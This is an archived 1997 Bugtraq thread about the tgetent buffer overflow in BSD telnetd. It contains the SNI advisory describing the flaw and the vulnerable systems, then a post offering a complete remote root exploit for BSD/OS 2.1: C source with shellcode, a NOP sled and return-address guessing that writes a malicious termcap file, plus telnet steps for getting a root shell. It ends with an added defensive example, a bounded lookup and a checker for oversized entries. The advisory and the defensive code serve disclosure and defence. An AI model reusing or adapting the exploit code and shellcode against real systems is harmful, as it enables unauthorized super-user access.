Date: Tue, 21 Oct 1997 18:24:02 -0600
From: "Secure Networks Inc." <sni@SILENCE.SECNET.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: SNI-20: Telnetd tgetent vulnerability
X-Premail-Auth: Good signature from user "Secure Networks Inc. <sni@secnet.com>".

                         Secure Networks Inc.

                          Security Advisory
                           October 21, 1997

                  in.telnetd tgetent buffer overflow

This advisory addresses a vulnerability in the tgetent(3) library routine
which allows an attacker to obtain root privileges by connecting to a
vulnerable system's telnet daemon.

Problem Description
~~~~~~~~~~~~~~~~~~~

A vulnerability in the tgetent(3) library routine can result in a buffer
overflow in the telnet daemon on some BSD derived systems. By uploading an
alternate terminal capability database, an attacker can exploit this
vulnerability to gain unauthorized super-user access to a vulnerable
system, or to gain super-user access on a system to which they already
have access.

This problem can be exploited by mailing a file into the system, or by
uploading a file via FTP. Once this file has been transferred to the
remote system, the attacker need only be able to connect to the telnet
daemon to obtain super-user access.

Technical Details
~~~~~~~~~~~~~~~~~

The tgetent(3) library call requires the caller to pass in a buffer in
which the terminal entry is stored:

/*
 * Get an entry for terminal name in buffer bp from the termcap file.
 */
int
tgetent(bp, name)
        char *bp, *name;
{

The tgetent(3) library call does no checking on the size of the data which
is placed into the *bp buffer. Many programs pass in a buffer of size 1024
bytes. By creating a termcap terminal specification larger than 1024 bytes,
we can overflow a buffer in the calling function. If this buffer is stored
on the stack in the calling function, we can cause arbitrary machine code
to be executed.
The BSD telnet daemon calls the tgetent(3) function as follows:

        char buf[1024];

        if (terminaltype == NULL)
                return(1);
        if (tgetent(buf, s) == 0)
                return(0);
        return(1);

By specifying a terminal capability entry which is larger than 1024 bytes,
an overflow occurs in the telnet daemon, allowing arbitrary machine
instructions to be executed.

Impact
~~~~~~

Remote users can obtain super-user access on any vulnerable system; local
users of a vulnerable system can obtain super-user access as well.

Vulnerable Systems
~~~~~~~~~~~~~~~~~~

BSD/OS (BSDI)

        Version 2.1 of BSD/OS is vulnerable
        Version 3.0 of BSD/OS is NOT vulnerable

        BSDI has issued a security fix which is currently in the testing
        phases and will be available at the following location:

        ftp://ftp.bsdi.com/bsdi/patches/patches-2.1/U210-043

Solaris 2.x

        Solaris 2.x is NOT vulnerable to this problem

AIX

        AIX is NOT vulnerable to this problem

HP-UX

        HP-UX is NOT vulnerable to this problem

Linux

        The current versions of Linux which were tested include Slackware
        and Redhat, which appear to be NOT vulnerable.

IRIX

        IRIX appears to be NOT vulnerable.

NetBSD

        Current versions of NetBSD are not vulnerable.

FreeBSD

        Versions of FreeBSD newer than 2.1.5 are NOT vulnerable to this
        problem. FreeBSD-current, FreeBSD 2.1.7 and FreeBSD 2.2.2 are NOT
        vulnerable.

OpenBSD

        Versions of OpenBSD newer than 2.0 are NOT vulnerable to this
        problem.

Additional Information
~~~~~~~~~~~~~~~~~~~~~~

This problem was discovered by Theo de Raadt <deraadt@openbsd.org>

You can contact Secure Networks Inc. at <sni@secnet.com> using the
following PGP key:

Type Bits/KeyID    Date       User ID
pub  1024/9E55000D 1997/01/13 Secure Networks Inc.
                               <sni@secnet.com>
                               Secure Networks <security@secnet.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzLaFzIAAAEEAKsVzPR7Y6oFN5VPE/Rp6Sm82oE0y6Mkuof8QzERV6taihn5
uySb31UeNJ4l6Ud9alOPT/0YdeOO9on6eD1iU8qumFxzO3TLm8nTAdZehQSAQfoa
rWmpwj7KpXN/3n+VyBWvhpBdKxe08SQN4ZjvV5HXy4YIrE5bTbgIhFKeVQANAAUR
tCVTZWN1cmUgTmV0d29ya3MgSW5jLiA8c25pQHNlY25ldC5jb20+iQCVAwUQM1yd
EB/bLKAOe7p9AQFptAQAiYpaZCpSmGgr05E698Z3t5r5BPAKUEtgvF53AvZUQLxz
ZsYsVU5l5De0qKWJOQ/9LiDyWu1lvKhlTphbLy2RatWD4kO3oQL9v3TpSXm2WQhU
uIzyZvj7S5ENodNnKn+gCDIvbou6OMot+7dRbWWgN2oabbru4CSlOxbG++yaTz+J
AJUDBRAzTefbtOXez5VgyLkBAd0bA/43eGEgvPOFK+HHWCPpkSWCwtrtDU/dxOVz
9erHnT/CRxeojCI+50f71Qe+kvx9Q1odz2Jl/fLxhnPQdbPnpWblIbu4F8H+Syrj
HTilDrl1DWa/nUNgK8sb27SMviELczP1a8gwA1eo5SUCG5TWLLTAzjWOgTxod2Ha
OwseUHmqVIkAlQMFEDNOVsr/d6Iw8NVIbQEBxM0D/14XRfgSLwszgJcVbslMHm/B
fF6tHoWYojzQle3opOuMYHNN8GsMZRkc1qQ8QuNA9Aj5+qDqEontGjV5IvhBu1fY
FM77AhagskaFCZxwqV64Qrk328WDO89NGSd+RuovVNruDdn20TxNCEVuPTHjI0UA
8H+E6FW9jexg6RTHhPXYtCVTZWN1cmUgTmV0d29ya3MgPHNlY3VyaXR5QHNlY25l
dC5jb20+iQCVAwUQMtqTKB/bLKAOe7p9AQFw5wQAgUwqJ+ZqfEy/lO1srU3nzxLA
X0uHGHrMptRy/LFo8swD6G1TtWExUc3Yv/6g2/YK09b5WmplEJ+Q09maQIw+RU/s
cIY+EsPauqIq4JTGh/Nm0Z4UDl2Y1x4GNtm0YqezxUPS0P0A3LHVLJ3Uo5og0G8O
gPNrfbVz5ieT14OSCWCJAJUDBRAy2hd2/3eiMPDVSG0BAVNhBACfupfAcNhhnQaq
aI03DOOiZSRjvql1xw4V+pPhM+IksdSK3YNUZVJJtANacgDhBT+jAPRaYbBWI3A5
ZMdcSNM8aTG0LWMLIOiOYEm6Lgd3idRBFN0Js08eyITl8mhZ33mDe4I0KQri9UiV
ZcPYTbb9CWM6Hv2cMbt6S6kLnFziqIkAlQMFEDLaF0+4CIRSnlUADQEBCLoEAJwt
UofDgvyZ4nCDx1KKAPkkXBRaPMWBp46xeTVcxaYiloZfwHfpk1h2mEJAxmAsvizl
OtIppHl4isUxcGi/E2mLCLMvis22/IQP/9obPahPvgNaMLVtZljO1Nv3QFEkNciL
FEUTNJHR1ko7ibCxkBs4cOpirFuvTMDvWnNaXAf8
=DchE
-----END PGP PUBLIC KEY BLOCK-----

Copyright Notice
~~~~~~~~~~~~~~~~

The contents of this advisory are Copyright (C) 1997 Secure Networks Inc,
and may be distributed freely provided that no fee is charged for
distribution, and that proper credit is given.
You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers
and advisories at ftp://ftp.secnet.com/advisories

You can browse our web site at http://www.secnet.com

You can subscribe to our security advisory mailing list by sending mail to
majordomo@secnet.com with the line "subscribe sni-advisories"

Date: Thu, 23 Oct 1997 04:36:00 -0000
From: Joseph_K <joseph_k@CIRCUITFROST.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: BSDI termcap exploit

Here's a remote exploit for the BSDI termcap buffer overflow that was
discussed here....

Enjoy!

Joseph_K

---

/* BSDI BSD/OS 2.1 telnet-exploit ; evil-term.c
**
** Written by Joseph_K the 22-Oct-1997
**
**
** Original shellcode by mudge@l0pht.com but modified a tiny bit...
**
** This program must be compiled for the BSDI architecture...
** You will need to transfer the file 'termcap' this program creates
** to the host you want to penetrate, possibly by anonymous FTP.
**
** Then start telnet and type:
**
** telnet> env def TERM access
** telnet> env def TERMCAP /path/and/name/of/uploaded/file
** telnet> open victim.host.com
**
** tadaa! r00t shell...
**
** However because of the invalid termcap entry, there can be some
** hassles....You figure it out....
**
** Damn, I'm hungry...
**
** Special Greetz to TWiLiGHT!
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "./termcap"
#define entry "access|Gimme r00t:\\\n :"
#define bufsize 1300
#define default_offset 870     /* Should work...*/

char shellcode[] =
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";

/* current stack pointer, used as the base for the return address guess */
long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[])
{
   int i, fd, offs;
   long *bof_ptr;
   char *ptr, *buffer, *tempbuf;

   offs = default_offset;

   if(argc == 2) {
      printf("using offset: %d\n",atoi(argv[1]));
      offs = atoi(argv[1]);
   }

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   /* fill the capability field with the guessed return address */
   bof_ptr = (long *)buffer;
   for (i = 0; i < bufsize - 4; i += 4)
      *(bof_ptr++) = get_sp() - offs;

   /* then overwrite its front with NOPs followed by the shellcode */
   ptr = (char *)buffer;
   for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
      *(ptr++) = 0x90;

   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

   /* emit it as a termcap entry larger than telnetd's 1024-byte buffer */
   printf("Creating termcap file\n");
   snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry, buffer);

   fd = open(filename, O_WRONLY|O_CREAT, 0666);
   if (fd < 0) {
      perror("open");
      exit(1);
   }
   write (fd, tempbuf, strlen(tempbuf));
   close(fd);
   return 0;
}
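The following is an added example written for this page; it is not code from the SNI advisory, the BSD telnetd source or Joseph_K's post. It models the tgetent(bp, name) pattern the advisory quotes with a bounded lookup that refuses an entry which would not fit the caller's buffer, and adds the check a defender would want: a scan that reports termcap entries larger than the 1024-byte buf[] telnetd passes to tgetent(3). The function names (tgetent_bounded, count_oversized, build_sample_termcap), the simplified termcap parsing (names up to the first ':', backslash-newline continuation) and the sample termcap text are all assumptions constructed here.

```c
/* Added example, not code from the SNI advisory, BSD telnetd or Joseph_K's post.
 * A bounded counterpart of the tgetent(bp, name) call the advisory quotes, plus a
 * checker that flags termcap entries larger than the 1024-byte buffer telnetd hands
 * to tgetent(3). Termcap parsing is simplified (an assumption): an entry opens a line
 * with '|'-separated names ending at the first ':', and a backslash before the newline
 * continues the entry onto the next line. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define TELNETD_BUF 1024   /* size of buf[] in the telnetd fragment the advisory quotes */

/* Lines that cannot open an entry: end of text, comments, blank and continuation lines. */
static int skip_line(const char *l) {
    return *l == '\0' || *l == '#' || *l == '\n' || *l == ' ' || *l == '\t';
}

/* Start of the logical line after the one at `line` (a backslash before the
 * newline continues the line); NULL at the end of the text. */
static const char *next_line(const char *line) {
    const char *p = line;
    for (;;) {
        while (*p && *p != '\n') p++;
        if (!*p) return NULL;
        if (p > line && p[-1] == '\\') { p++; continue; }   /* continued below */
        return p + 1;
    }
}

/* Is `name` one of the '|'-separated names that open the entry at `line`? */
static int names_match(const char *line, const char *name) {
    size_t n = strlen(name);
    const char *p = line;
    for (;;) {
        const char *end = p;
        while (*end && *end != '|' && *end != ':' && *end != '\n') end++;
        if ((size_t)(end - p) == n && memcmp(p, name, n) == 0) return 1;
        if (*end != '|') return 0;
        p = end + 1;
    }
}

/* Join the entry at `entry` into one line by dropping each backslash-newline pair.
 * Copies at most outsize-1 bytes plus NUL into `out` when out is non-NULL, and
 * always returns the full joined length so the caller can size-check first. */
static size_t join_entry(const char *entry, char *out, size_t outsize) {
    size_t len = 0;
    const char *p = entry;
    while (*p && *p != '\n') {
        if (p[0] == '\\' && p[1] == '\n') { p += 2; continue; }
        if (out && len + 1 < outsize) out[len] = *p;
        len++;
        p++;
    }
    if (out && outsize) out[len < outsize ? len : outsize - 1] = '\0';
    return len;
}

/* Bounded version of the unchecked tgetent(bp, name): fills bp only when the whole
 * entry plus NUL fits in bpsize. Returns 1 on success, 0 when there is no entry
 * named `name`, -1 when the entry would not fit (the case that overflowed buf[]). */
int tgetent_bounded(char *bp, size_t bpsize, const char *termcap, const char *name) {
    const char *line;
    for (line = termcap; line; line = next_line(line)) {
        if (skip_line(line) || !names_match(line, name)) continue;
        if (join_entry(line, NULL, 0) + 1 > bpsize) return -1;
        join_entry(line, bp, bpsize);
        return 1;
    }
    return 0;
}

/* Checker: number of entries whose joined length exceeds `limit` bytes, i.e. the
 * size test tgetent(3) omits, run over a termcap file before a daemon reads it. */
int count_oversized(const char *termcap, size_t limit) {
    int oversized = 0;
    const char *line;
    for (line = termcap; line; line = next_line(line))
        if (!skip_line(line) && join_entry(line, NULL, 0) > limit) oversized++;
    return oversized;
}

/* Constructed sample termcap: an ordinary vt100 entry and one whose capability
 * field is padded with `padding` bytes, the shape the advisory describes. Caller frees. */
char *build_sample_termcap(size_t padding) {
    const char *head = "# constructed sample termcap\n"
                       "vt100|dec vt100:\\\n\t:co#80:li#24:cl=\\E[H\\E[J:\n"
                       "access|oversized entry:\\\n\t:pd=";
    const char *tail = ":\n";
    size_t hl = strlen(head), tl = strlen(tail);
    char *text = malloc(hl + padding + tl + 1);
    if (!text) return NULL;
    memcpy(text, head, hl);
    memset(text + hl, 'A', padding);
    memcpy(text + hl + padding, tail, tl + 1);   /* tail plus its NUL */
    return text;
}

int main(void) {
    char buf[TELNETD_BUF], *text = build_sample_termcap(1500);
    if (!text) return 1;
    printf("vt100: %d  access: %d  oversized entries: %d\n",
           tgetent_bounded(buf, sizeof buf, text, "vt100"),
           tgetent_bounded(buf, sizeof buf, text, "access"), count_oversized(text, TELNETD_BUF));
    free(text);
    return 0;
}
```

In the telnetd fragment the advisory quotes, the caller would replace tgetent(buf, s) with tgetent_bounded(buf, sizeof buf, termcap_text, s) and treat a -1 result like "no entry"; count_oversized is the same size test applied to a whole termcap file, which is the check the 1024-byte buffer needed before any entry from an untrusted TERMCAP path is copied into it.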